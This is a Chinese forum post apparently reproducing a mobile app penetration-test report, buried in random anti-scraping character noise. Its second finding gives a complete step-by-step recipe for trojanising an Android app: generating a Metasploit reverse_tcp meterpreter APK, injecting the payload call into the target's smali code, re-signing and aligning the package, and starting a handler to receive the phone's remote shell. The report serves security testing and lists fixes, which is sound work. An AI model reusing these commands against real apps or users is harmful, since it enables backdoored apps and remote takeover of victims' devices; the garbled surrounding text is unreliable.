! W# m i) Q7 z6 n " v) `8 h9 E% G 1-2 测试结果 2 T) B# E: l0 N' ]* G : c: p& l: P; H+ ] N6 \

2 C2 G/ K+ U% V1 ]$ R" D4 C * Y: A% C+ e# b0 s3 a% f; ?! S% ]

1 z' ]+ C: q( h% K% `0 r + D. Z9 h9 M' a8 P% |9 ]$ M   1 G, A4 C+ D% z $ j& s8 Q4 j, }$ b- o9 k& n

7 T8 k e$ n+ @1 t / M" D% n4 Q* h0 Z# g% a

( H! U+ Y0 [! `. e" x3 Z( C" c - a4 g9 K" [, a/ I 2 检测结果                    & l/ c+ n9 n6 o' C! g# A7 J ; J O9 B Z) g- U0 u5 P* q

" V: y3 ]9 Y* F, a4 A 3 J D j1 L6 n& ]. k" i

" _$ ^! j$ {1 y) U) Y+ O! k3 q, L7 r 3 l$ W! ]) g4 @# B. d 2.1 某某某 d6 \5 d/ @" E9 r5 {0 [0 j5 A* ? z) D8 _( M+ N+ ^# n

9 I! }8 H. U4 @ & a' W# t: }1 o' A

+ k0 y" R& Q3 S, {9 N- t - c7 |: y2 E0 \: }5 s' z 2.1.1检测目标 * I2 m) |0 B( ^. g; @- T% H) r! a9 g6 _+ P9 z# H3 D O

: f! H3 |/ p; o! a0 k0 J) Q ) ^& i4 V5 ?; }4 T; M5 q- l

5 {& f6 J. q- ?3 l v6 ?# l ) X/ E$ x U% w/ G0 v 目标地址: 某某某某某某APP A7 ]3 z- ~5 ?( s/ c. E 4 D Z$ w$ V3 T9 s: a; l3 X$ `

# J$ ?6 n$ [& z- w/ S ' Z# Z5 ] }& Q/ d) w6 F+ i

+ V; A! x( z9 Q* q1 g4 L" G & f! l0 t9 u* ?: I0 e 2.1.2检测结果 # `% N4 x! [. ~" {7 S3 I. L8 ` . r2 r1 R, S7 g

# c) d. M+ S7 g3 n5 F( P. ]" c% M: y T 1 L" P- E0 j) d# v* Z' V

: p7 W0 v( m. x& c! L8 Y 5 M- G0 w2 D2 t/ W& Y9 m 2.1.2.1 + E* f3 q$ I, }% M4 r) Y% m" g' {. E - t3 f9 T, F5 m

0 I+ [ H" L$ ^9 [( U" V8 } 9 G. e" u7 w8 C4 Q5 u$ w6 N

; w# t \9 {- h$ o m( G6 k6 k; w 2 \0 L' R/ O7 m, k9 }; H0 G 漏洞链接地址:某某某某某某APP 1 G, i4 |, L; i6 ~! P2 H2 E) L r% v5 R' X1 k: e! u( O: U v* ~

- l/ e/ V9 j* ^2 Z 6 I$ ^/ K' ]( I' i

6 i* P& a% n+ n' |9 y ; l7 o* O* Y7 N( K& _% y   7 x! W7 N+ G: Q2 H6 _! n, P7 d4 c7 _) o+ G: P

: T% C6 T0 L* w . ?2 M$ S. l& | \9 y- s0 f' r

1 Q! i% Z# @' I5 A 0 {5 \ U7 Z2 T6 N; Y9 z y 漏洞分析及取证: 2 y4 |3 @ K. F C2 r / K! Q- I; P! b& k6 W) W

2 {" R7 I. G2 ~: B O$ X : n2 a! d" k/ W- @- K: n0 y' P8 R F

. Y9 y3 x$ q% a: E# k o6 L 4 y# X& k) C1 _7 G                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: : {1 M9 b& z* n% ^ 1 V& d* c' `6 X" z5 n# i

/ x, G% u. s, w: ]/ @- x; }2 U ( B1 @! k/ X& a$ |( i' S, O; P0 [

4 O, j5 v$ W: f" Y ( O: S" X+ R4 n      6 @4 c9 `& X! }3 S, J/ c4 o; f* C % m. |3 M3 {( ]8 X) q- y8 n

; f5 |( o' y+ Q3 t0 h) D5 s/ u) ? 3 T% z; l+ |4 W& D) V* ?5 O

1 y! H- w4 m9 K! f9 V) P8 Q% o* ? 1 S8 F% A4 r" N3 {! I                       3 ^1 w- f# ^1 ^+ I6 W 3 H9 t! m& R |! P/ F) K+ [

1 }( Q; T0 f* Y7 I: x) V8 b4 h + }9 j% L% I5 X) \! d! j0 I# @

4 Y! W) Q H* u1 A$ ~ 8 Z7 r" M& _3 H + a" M& e. ]" b ( L0 f" ]& S& u0 R

% M, l& L9 [, G' Y* {" A3 A6 a 5 \" Z9 m, z6 V9 N9 d

- _% P5 a' W, ^/ K: W . x6 ^# z/ {5 B9 m& w1 l* g; r : U% f+ X+ E |$ R" r9 j 0 t, [* y# D/ |

; \7 |0 S# |$ h7 q/ J$ V- @& y% [9 v A7 ]) ^& _( q

& B: x: O" c+ Z0 t - J* |+ f0 D9 i' G . }* y* M2 Z* y2 l5 {: J# q* B7 `5 N5 q; T& P

2 g% \3 y) P: Z- t7 j! o2 k 5 H$ B6 ^0 ^# M

8 T' I& V! i7 |- C9 `4 }2 z2 L8 E 漏洞危害:高 : F* X; Z9 \ I ; ]4 l2 d) X. h/ s

) d; o4 H' ^: H0 E" M: Z3 S( F4 d! F7 G
& A# w) b' R: S$ h+ L* ?+ e; z! {" r' Y8 b5 {6 e' ]9 u ` # H8 h4 i6 f+ j7 J6 X9 q) o9 W3 s; s1 Y% j, l# h8 ^1 N0 d; X; \$ a& {- o" p) S: ] N# O/ w: T1 l8 r* Y" [ D0 [/ Z6 b/ I6 F; M. I# t! Z; x0 ]. ^+ r8 x- p5 I7 f/ A" L$ e8 @# [- \: [! ~$ p$ J* [" h4 S4 X- K& m. P0 n; g1 j; M/ t5 Y+ S" t) `+ W( r8 y% c8 L% c/ h$ C8 n! K8 q, D" |/ {, U2 j' R* ~9 c- u. s. [+ d6 J" o% v( ?- x8 v% K0 k( e. P$ P* u5 `7 ~8 u2 s4 l5 w9 `- Q* @/ D' @+ v6 X h' `$ g1 F3 ]" g1 p5 F& A7 Y0 |) L0 S2 C4 y, f# Q9 F( X! B3 J8 C* O4 e: P8 N3 V4 K) d2 W2 x- n+ b/ C: E5 q( L3 O) p& d5 }- ]9 X) g; X- P' N n, H$ `. g) q8 m* f( j/ E) Y/ G! j: \9 e" U9 r/ K! E8 V5 a. T8 Q9 M
$ ?7 e' G# x* P M. G ( K! h5 j+ J( y0 C

7 @; \5 z' r: }9 O4 f) N $ Q/ c/ Z2 u( S3 J+ @" a/ Q4 o 严重程度 " V4 i) [: r0 z }0 p/ g: i" d3 f8 Y! [& g) P) h6 {. J

6 Q3 C, t% b9 a; r0 S; T . ]3 {& @% }9 o- z4 ~$ N! P 		) |7 P$ b) c( M. D: @& ` - r: l* T8 V* l* p, I' w

0 C) W4 V1 X6 r1 G; \- B % ~, @+ i2 m2 H2 u : m8 n9 M( m% \5 d+ G* J h% y+ j 9 ? t0 c3 e3 p/ {! g

+ i; }5 s3 B" \7 ]% K& [/ p6 U) u. D. ^: s! s9 Y3 M 		7 ~8 d* |, \" P/ ?# |% W9 q( G: ?. t1 s2 u3 ~

; v$ e% w% d# u3 g& i" h4 y0 p " n( d. A q1 ^6 x: { ( c# z# r* R6 x) z7 y 2 l* A; p2 z0 r& e4 Z: {0 V

, h# `) |% i7 g+ X5 y0 y6 V1 n4 c1 G 		6 L2 [. |- @+ A, x 0 x& O7 C' b; s; ^; }0 G

0 ]# p- `: O/ ~8 r) M) H 6 C6 B# |; @! W( X. f0 i$ v9 B - N' k* t, o; V8 { % C1 D. g7 q3 [- G6 N: |$ a0 d

% t; d" s( z& l2 z + h4 q$ O0 S5 {1 f/ n% J3 w 		2 U! J, d2 I4 S& o, w& z% t5 G2 }/ i& d U6 S" N' X

3 m# ~, R1 G# n8 b; ~: s7 S+ i. g P3 P! C' A7 D, {5 y) e   ) N6 h" X0 d( I2 l/ ] 9 {0 j& [! q P! l L+ m. H' V B

4 D9 f) B2 c7 Y # m$ K& ~ J: _9 c; R 		: G, r2 B( m0 y9 \, X 4 ^6 f% E+ {, O

; r: o8 d7 }2 y3 F 0 N% l8 Y8 @! B, H: k % {! j5 P4 V% H1 w 7 p! w9 b# y# T4 R. U

+ y+ d5 P, F% ?" X % v# X6 N E4 Y: B 		- }$ q1 |" G: L- [ w 3 q+ A" `: x4 K1 S& n4 t

% c, ?/ x! \. Z3 c* W! o1 X, w# R- I$ ^, q   & g0 L" T" i- m 3 c+ z7 k; g" W! ~2 I& R

4 m4 U) ]* A5 l, M/ b5 i) i2 `! x. b4 r4 _) K- d8 B9 y
- _3 D7 u( I- b 6 ~( G+ L. Q J' h6 I/ P
- T# |2 L# l% }/ N: X : x' D1 S2 Z1 G

" N" Y- _& m# j! z# c7 J+ b8 k 8 O, j2 t: ^' d0 t5 s4 g6 ^   7 u+ z$ Y k9 J2 h $ ?6 A4 v+ `/ v' V' o

- C2 _& X8 m; X9 K - u! D( H, k. p2 s& c* Y

& I; l, M' J/ z% R3 |. x+ l- R8 T7 Z' Y$ Q2 Q 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 4 }/ A1 g @$ M/ B7 F 4 b# h( D5 O3 B# Y% q- P

- n* b- ]0 Y) Y' }8 z; i + `$ u: l+ V; v6 j4 `

8 j" x0 u, H5 Y# y0 F& E p, u1 q5 c% B" `5 ~           4 C4 J2 R7 J: v t5 h+ r8 _0 y: z% X8 n

$ C! V( M- e5 G$ s4 [0 s6 [. }& T, ^' I9 e8 o1 b% G; \

0 @5 I- S4 S( {! ], r. a' B6 A. ]* T+ g6 S: T2 z8 k   6 M3 {/ l: Q! ]2 w* t 6 Z2 C2 t% ]) ~; N% o

# V* N: s0 L+ w S4 t) X U- C' N( t0 b6 @+ I

$ Q$ a# R! _4 V) f5 W4 w q. X0 t1 R6 h/ L2 J: W9 w/ y 2.1.2.2 ! ]; d; H4 i, |& y: V * t* X8 Y+ V: y, q+ y7 f

& m% g; _0 Z2 q8 Z: `0 v- ] + |/ W r5 T( h8 [

- f4 t4 S4 G, Z- P) G3 ]2 z6 d" C; |8 @# i- l8 i- J+ D- T 漏洞链接地址:某某某某某某APP 3 j. E' E* c5 j% ]. H2 c" M _8 J I6 v' O/ P8 }

, b2 x: H! m9 \ 1 o6 v* H# o3 E; e, z; b

& T% Y4 Y+ o. k' L 4 f* ?- M! p0 {$ w% d2 n 漏洞分析及取证: . R/ O% w& I( s- k7 @ 0 W. ?4 S) d$ J8 Z

. V0 }1 b6 Q, z( I# j, k; h * q7 J# V: a" x* t5 `; `* f3 | N

: U" u: x% o5 @( w; H* x3 e 7 ^* o/ i9 m# r0 [8 U2 L3 r2 G                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: " M" ?- F/ [: A- L# L E5 y R8 E+ o2 m0 Z

/ ~6 m; ]& s8 M# U9 |/ k* l/ }% A. I! y

5 i+ d3 T0 i: i" U . M9 X, }' F" I. _0 c- t' W' w, I Metasploit 生成木马 apk # o* O4 ?5 B* k& H4 n1 R+ v/ M; S & t( w1 V. \$ @( x' B- c( d

9 R6 P2 k/ G( B1 T; [$ O9 x' Y5 c: z) D, c f3 |; I X

6 o2 \1 v( D+ @# m% O. i- { i6 q. e+ k msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ( l+ q e, ~$ m1 x1 t . K n" W" {. p" L, d; ?5 Y

. X3 q, ^, n: w# M6 W 2 b3 N# m. |. y

( @0 M' w v$ q/ O: g0 ] l% C+ Q: J% L6 b9 g 反编译目标apk和木马apk 0 C* G$ P) u# E0 f: I5 D: Z7 T0 p9 g Z7 z/ U' M) b4 v

& s- u0 h# e( A; C" S ! T" ~! p1 V2 y% s6 k+ ^* z

& x, J, ]+ ?; b! Y * w6 `, X& w: G8 O$ N% o apktool d target.apk
- Q/ } @7 L/ o m 7 y o3 Z/ \+ _+ m apktool d cockhorse.apk - G6 x8 I; S% I * b2 C" m/ |! j# z

! h& A# w" N) u1 I5 U$ x3 o* I - \& S' c. h, Q3 X

) ]1 S7 P6 c$ S) ?4 y + A, K2 Q* _* M# k2 G* k 木马 apk 注入目标 apk 3 c1 b* z5 z) f! @: \" b 8 V3 o( @7 n( r0 o

. b" K1 U4 n4 u( R' N! p! a; f" K 5 V, b. O* j& f6 q# R

8 ? R$ H* D4 c; V6 b* N" B( R 1 ~& y% t) H4 l6 Z" @9 K' e- l; Z& U 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
6 }, P6 F/ Z( w4 D0 E! D ; M* _! z4 B7 P* B- C+ y& \- h$ @ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V " ? G+ E M: B! e: _) x : Y" Z4 m* `9 ]! V

6 @8 @& e' N1 u, ]) s+ u 6 V4 }# _5 O5 T

2 A A( N$ p+ X* f# d" }! j9 E/ q# Q. {3 M d9 H2 s 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' s7 h' I0 a3 y0 U 3 U5 k2 g) S# B

, S2 I5 z, W0 T% j8 V- f7 M2 R# v* V ( L& Y3 x$ L4 D

9 i" R9 r; r% P / d! E: B# Z# s 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 7 H( `$ v, V! c3 @2 v' |2 ?0 C, _( Y' A8 Q% l

7 `: n- d8 Z) x/ l p1 n! o+ y 6 R) L- N! d0 M* {

/ \6 @' Y: N+ O& e; W: U9 A . g* P; E, P. o" W$ j 回编译生成最终 apk + r' S" t$ U. [) u5 @: }- I0 ^ & c2 s& Y( d! i8 [/ q

' Q: O' }2 E9 Z' P1 H7 W, l& O, M $ b9 G/ o7 D w. a3 I

/ }% O8 V% J& \ 4 `; q2 q# o$ ~2 u0 S2 k: p 重新打包 . g$ V9 k' F4 z6 B& B; Q! q2 Y. @ 8 Z$ U+ K2 D( B. j+ B8 Y

' g# U+ y2 }5 k) t; i* I 4 G( z& j1 K8 c9 M7 _

U; S7 H: h; a* h 6 X ?. c' V0 }! Z apktool b -o repackage.apk target_app_floder 2 Y5 Q' A. L- t: X! J. T0 B- p a& w0 ?1 r9 Q4 e# ^

" f1 I( G" c- u# O) B2 G+ ^: h3 T% a8 {% k+ }0 D

; ^) [! E' N R8 e4 V1 W 9 J, K0 M6 V* p/ C ]. c" S7 ? 创建签名文件,有的话可忽略此步骤 1 P8 \4 S3 k. W0 N- C$ N3 q" X$ k7 I! [* K/ \+ X. c& k# D

* q. P. K+ D$ w% S 0 W+ \; b. g, \/ A0 A. r

( R. B3 t( o% K, K1 O2 v- ?, j' Y" s4 v/ h2 s: D! x& f keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                4 \: C# Q% z2 H% S, R: G& L8 @, q * {3 N' O- \' g0 G8 ]" C

$ Y8 h6 Z1 v7 g2 ~1 k1 ~ 5 B; g+ p H/ d8 Z; Q6 i2 P7 O( m1 z

3 ~" Q, y! j$ J ; d0 Y; f6 U5 W8 n; s" v 签名,以下任选其一 - f4 n% A; g6 J" U5 U) ]6 \ 0 w9 o! u0 s6 e0 m( u

: ], ?- X2 u A- |7 r3 y4 D. R3 b5 \7 u9 Z

( ?0 g3 o0 ^& k! t( }$ s/ {4 T/ f" i7 S8 j' c3 ?8 V. m jarsigner 方式 6 \5 F, y' Y4 n" i$ ] # s# o2 [' t; g; t

) U B+ q: g# j7 g# m 3 s. W1 {. o7 e3 }1 I. y

% k+ U U8 w/ ~. l 7 b' X2 h. f4 E jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 g$ ^: y) v. ~ 9 y7 p; E0 t1 ~& c$ S: v$ N

& b7 X" k& E" I- c' S4 X 6 _3 d* X3 b! h) L

8 K7 c, P; O5 C6 n" p( ^- w& r) C t4 L/ h0 m apksigner 方式 3 p1 @* E1 I$ L) q' Z 9 m7 Z( B" L- P( M( s2 g9 p" I. r

! E1 k" a* n: }6 w4 u$ H ; o; k- g8 W1 Y2 v' D4 E/ L

" c7 Y* n: c* Y% M% x! a " h/ t$ v; w$ j+ R/ E$ b$ X) ~' \7 ^ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 9 u$ Q- L# S% g% T( N5 @. y) S - |2 i+ U5 H- C$ h- f' J( y

' u% q" F h" b" D$ p* ]4 Z " y5 X9 m3 E, w

; k2 B) H5 R5 a0 K! u ! B: n; c$ n4 B( Y 如需要禁用 v2签名 添加选项--v2-signing-enabled false ) j% b8 I0 ?! d* ^ 3 V+ {, {( b9 P- o

6 w y& u6 @$ z1 f0 P9 v & B3 N& y- Z( @7 B4 m

8 O) ]' C4 {( p7 h' b% l/ ` ' k( N# C! U/ q 验证,以下任选其一 % Z% s8 B& A% C3 y $ v) N- r) X6 \

0 @+ s- X! ^" u! ~* r& [ k& o! }! i: |' T: R

5 r* t6 J. \- a; K% j - U0 t1 u* R' @% i' k* n jarsigner方式 & m+ I: R4 e+ n, X' p) m, B5 X. C8 @8 N) T" a+ F

. d5 r7 z+ x a; N; w1 `/ j9 R& v. B4 s% u9 t. p2 m

" q; |, U9 Q+ q2 y' n$ w' o/ Q . \! `3 X/ X0 I) ]. M6 t2 t& v1 Q0 _, i5 y jarsigner -verify repackaged.apk 8 k/ I2 @' J. I, Q; w & b/ _" @/ J/ M# Q/ g

$ R4 k- ?! p; L' q# C9 q. O " q7 M, d' t: [: U! o

* L9 `& m5 b1 O/ o( Y" g! l" S- r9 \+ H, T* Q! e2 P, O7 H* z apksigner 方式 5 r! x7 U" O/ T2 Z/ ^5 ? u% F9 C- P6 B( h% e/ z" X K( J

0 U+ m+ B; D ~! i( M+ E P! L! L2 K0 m& Y) d8 `/ G) F/ J

/ A( |9 G v& `1 O w + v! q: E$ `" [ apksigner verify -v --print-certs repackaged.apk ) i8 Z ~; W+ a& e % ^7 B+ i4 \) a; |2 @

$ P0 ] V6 Q3 _, j% C+ w6 K8 { : z$ y1 g+ I; u

5 O% M1 T' P# B: V, n ' |4 b" E6 Y4 H keytool方式 ; D3 r& c2 B! y! @ 7 ?" T: P3 Z- f; m2 x% a% B; q

7 t; D, v8 P+ V3 }! Q + R5 h1 c4 R2 E3 Z

) I, b, ^- k0 l; [# e; [2 s( s7 D/ A& ], b* I/ ] keytool -printcert -jarfile repackaged.apk ' E6 [4 k6 ]6 t' _ + w" o7 C- r4 [% ?' F

( c6 ~* f3 U! s+ J O4 L 1 ^" o: R& r) ]* B j

# Y# t( [& I v, A, \8 F% C! C( g7 s4 v* v1 K) N 对齐 ' h- s$ L- c. B5 Y8 ?* y) q1 R$ `1 [# O# k# m' e0 U

) {8 e; K& r/ w- I: _% m 8 N! O' P6 E& C' [/ f* s7 | Z

! o6 r0 x6 ?7 w& j: n; F- n! S; c # Z* F( I+ ~# A4 g 字节对齐优化 2 O# S7 y+ U# n& f+ B3 L 0 d. S9 _! ~2 P( V

2 h; N* B" J# E2 ~/ S' z$ e4 t0 b* H x- Z9 r& y( `, R1 H; P( A" o

3 O( z* {1 P- S( |7 M) v : T' V1 m6 w2 D: e0 @, n zipalign -v 4 repackaged.apk final.apk , X8 n. W. h! L) T1 R) v; Z+ L- [ p, @5 O# ?

0 W) O1 A( n/ H* n+ a3 e' [( I, g& V$ H7 d/ \

! V7 S/ \5 L$ [: W$ `3 b; i4 P; O2 t8 `: o2 L0 x, j 检查是否对齐 9 t7 f0 _& o7 j1 Q& N" c' G3 n& w, }" h2 E/ e

$ M2 g6 P1 u+ e ; \% R0 h0 o, q7 g4 `4 j

9 R& G5 U/ J& F6 H4 X2 @( v6 c ; v/ R: F$ G8 D8 ?) G; l) t& q zipalign -c -v 4 final.apk 8 t3 o2 F( h+ ~( j/ S4 h5 U+ [( j& y# j9 x# z

. z7 U. t% b4 W9 l# ^6 W 7 q% ]8 U6 G2 W! o& q5 |7 q5 \

$ U# ] }( Z! [# K0 l7 I & ]. I( V; t5 l1 q3 n5 J! G 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 # \! ], l. b5 C 1 @ l, W" I( p9 X2 b

1 s& @9 f r. ]# ]4 S1 H( D. M* t8 m2 z' [6 h

- S1 K4 @3 [' C% K+ Y* y ) {! z( Q/ r$ v4 j 启动Metasploit控制台,配置参数等待上线 5 d3 ^0 h5 e: A1 ` 0 V% T3 |5 T" n2 K4 [8 e$ T

4 t. M: k! V% ` + \6 T) q' W) P X2 a0 H

' g. Y5 [, B' } [2 u, _ % d! {8 K- ~+ z+ r! {, [" R 在终端依次输入如下命令 A1 e* C" d# {3 T 6 F+ s9 q4 J7 {; n: i7 U3 e

' ]( D4 C H! T+ p1 ~ * }6 ~0 Z' R: b( s( h

0 ? g& K* o, J8 x# p7 r ~' |6 _" m0 _5 X msfconsole 9 t9 q9 x# w' o6 A# e7 T5 d( k, d3 q' r8 n, F& w0 W; M

% G, b1 `5 I( i * A( _: j/ Z0 a+ h8 k8 ]

' b6 { s* D: A) Z- E / F0 M: k' I* Y- O; ]4 h use exploit/multi/handler + k# } E7 l& b3 f $ k# L2 K: h3 h: p

/ ^1 w" K3 y8 X% W$ _3 O* B8 O$ \; y9 ~' E

c* ~/ Q7 h; f* g+ ?& `# U0 x9 d" H- T0 k set PAYLOAD android/meterpreter/reverse_tcp 7 j; l- r E+ C# ^. e % }4 h9 Z5 P" `- j. Q& ?6 c

* m! X5 l. ?6 P: T 2 o% Z$ D( N3 o9 W. T( i

9 O8 C- p% V3 F8 U0 H $ E ` `/ N+ ]4 ` set LHOST 192.xxx.xx.xx , Y$ o: Y2 _0 l$ J2 `, n, B ' A) I* l0 H) o) x

0 v( ]' H) }, q, q1 N ' e) c( L S0 g" f% Y, O6 D6 K

7 K7 \% m$ ~/ ^8 p4 M* ?9 V& g2 C. b" w$ `) R set LPORT 4444 3 z' _* W; g9 J( m 6 d4 O/ c7 V, z) ~0 K) i

* Y5 J% s6 ?* m4 Z; A$ F" |+ G" `9 P* W& m: N" F( s2 x' m7 S

' l3 ^1 d9 y' x$ j3 ^0 `9 o" F4 i& f4 B exploit # ]& R+ o2 |, e; N& S d3 Y/ l* C1 r

5 l$ M2 e7 Z( B# ~, [ q. P8 V7 ~4 P; ^3 {' a; U% d

2 o# N& U9 y; y# O6 }2 t & B" ]6 m" L$ s/ [" s% ~ 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               $ B A9 ?7 z* Q% }) U4 v# ] % ?+ [- e) n+ G7 R: Z

4 T. M1 M* M& u! y9 H8 b + i7 J% E# X+ k6 H

- e5 n- m' X, X; G) d& C! h) v& b8 }1 f: I7 r4 H, j9 e 漏洞危害:中 % D. f; Y" z1 y% o3 w5 f# L- K) Y. A* B/ k; G7 c0 E

9 [* n% R( F, J$ \. i2 P " Z* v. Q: j- `8 D+ a' M
, ?! d# u3 _; f& h 5 o7 s9 C: V4 L8 T . g8 Y+ l2 y7 J/ L) L1 W & `' v" w! s/ b+ v2 z J# K ! X* w# I8 c6 t0 S% C" r: @3 W/ J5 N: b7 ]3 N! F! r% T1 k5 F2 R5 b5 j! w1 O1 P$ f- V( V# g4 o7 T( _0 W! q, y S0 @4 p5 D2 O' X- c( s& k8 `- A% w# F+ C( x6 J5 G& s; \8 j( z8 N; I6 y( O4 N7 B, r, B$ a9 Q% }3 v: v5 p4 R4 O. f: k) o: d& |6 @: k5 g6 D- y' f$ y6 x( R" N" Y! t4 a7 T, }% c6 J& J6 |" v& @$ l- Z; H+ f3 e/ [/ d6 |5 b' |' @0 p0 S+ T7 B: ~6 ]$ j, Q2 c6 K; M |. x7 q' q1 O; U i& P; v Y0 u! r, a) ?. K" d" w9 Q# P* X0 r6 _: i" O$ n9 ]( l" s" c" |) q2 a2 N9 R8 U6 U8 z; v# x! A G( Y2 E- h" x3 {8 X- T& ~1 ]* l& A) W; H3 B2 t" o3 ?( m/ V/ E3 \8 A5 ]
N, d/ \. A2 P0 x 9 l! \% W, l0 M6 ?1 b

; \9 |4 A. e/ Z. {+ d2 d: D1 S: ^2 | L/ l3 X 严重程度 3 y& C- q4 }6 }3 i . U5 f( ^$ V; D: X1 ?! W

% M- H; w& Q; D! q% i h W a $ S& b0 J6 i$ E8 O: J) C 		^' ?- L. y: ^) L* q8 h% w7 X& k/ }5 i# P1 @

. \7 N X" n, B' A) L) Z3 r" [) y/ V M p: I& z; ^. @ ] L 9 ]" \: f- S7 q# C0 f3 J# g1 m 9 p9 @/ e6 N2 x' d( S+ o5 M

5 M, h1 \* ]% L- ?. Y( X 8 M& b8 w, ^1 I5 b$ U 		1 F9 b: N5 M2 I% T 5 K j0 s2 ~" [

. ]. X" M( k. x. U% x/ q( I) C6 F) |* _2 y: l c9 P 6 [$ r- j& S/ R6 w, I: U$ I $ G2 c; h) L; g* ^# }; l

9 ] _; g7 {2 G5 { : v) ]2 Z. K& l% E5 Z 		' }' c$ G' e) L6 s( o9 I ! R" L+ u \ D+ Y1 P5 ^8 B

% c$ o% a5 u: n9 S V' y% a1 a6 Y+ V ) @. f6 j' g* U8 y" D8 f3 W( B ! N6 M& R/ U8 u

, H) ?4 k G2 c& S8 @ & l% [5 p8 i/ i* O8 {: b 		, j9 G' P& A1 {! \4 {& q [- k7 A8 X6 _. K/ u* c+ ]/ `* O 0 B5 |( i$ q2 o: A , W. u, H# u. U/ `7 N N4 N

! U8 y2 `! p- i& | 6 S+ K8 y) B. Q& O   . ^2 m4 o" d5 M% g9 q8 ^' [; W( Y

! s5 A5 }* G: B4 S }. X8 H; b# q7 h N 		: A; g, ^; W* A" `. h7 `0 s 5 M5 f/ H8 V, k

$ E# c6 ^$ c/ j* h5 Y6 V ( N% L w+ c9 }7 M" Q& \ * w& G, T8 Z/ P s Y* b * k$ p& ~1 d2 p3 n+ H; S5 e+ H, l: r2 S

8 y( G. v/ g% i7 I $ }2 p! P# ]) J- D4 G( S( k5 t4 T 		# o' X, N) L, r' l/ s6 B& R " c1 |# Y F# A. A Z - y7 ?+ w& f5 U7 @8 C+ d + I8 @% R. x$ x

* B" E/ X- n4 p8 c; d. r8 I' L1 c) _, d   $ w, C @$ c0 J" D& m5 W 9 b8 V" m, X1 y9 S/ u# }9 o6 t2 _

4 } Y! M) M) S% a" e$ Y/ c3 J" d! f0 \ D; F4 n
2 S3 F9 Y: T! x$ a, _ $ K5 N" b. \) C6 t6 w5 R9 E: ?/ {& Z) ^
4 w' S, i' d# g: v 0 F) E- S) e( \4 z3 f8 N

P. U0 z5 t7 e g/ ?+ ? - u7 I6 m) z8 s. `1 n# E   9 Z0 E: i9 z" }% k4 n0 J + G, R9 W7 }, U# u3 [9 J

% f% o* A' c" b7 C - H6 m- O+ g8 |4 f4 K4 B& v

. Y8 k4 i% A6 N: [& g! L" ] 8 K8 l/ R% [1 S) [ 修复方法: 9 I0 A* e+ A& Y2 W( j# [& f/ l $ S( t( ]% R) |) ~" Z, b$ S0 Z

1 d# {! X$ c% O! v9 h. C, i& {* l' H/ @+ S6 R

" d* \! C* n. ]7 O) [) H! W* U 0 e; w, k \6 D. m& J9 m               1. APP 启动时应做签名校验防止二次打包。
K% r8 R; \& C4 O8 j ) G/ J6 N& l1 ? 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 9 G5 T# K$ n) T/ G, L1 I$ @ K4 y& e6 W: M+ s1 ~' R$ ^

: F. B9 H5 L8 i5 P: { ! U# L$ g1 U6 i; b; o1 w( w' z . d/ r" R% i, f' h / V0 v2 c6 |1 V% L8 F8 v

9 w7 T7 }! G3 A O, I; o. H2 Y; V, z- l8 h   2 |. e) U7 { p; Y) z ! y. [. j" {" q2 q

7 q% o5 F0 w3 @& X! x 0 c& r' M8 c6 g7 C- Y) J+ g ' w m. A* T7 G & d. ^1 p, r$ q+ V r

6 g `+ v) D0 Q9 J , F* F$ K( \. U. k9 J+ N
$ H" `& o# N' Y9 b( k' S* L ' H# J. a( I% ?) u3 u* Y8 o

0 z+ ?# n8 s/ q 7 F1 I3 \5 I. r* J' T
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表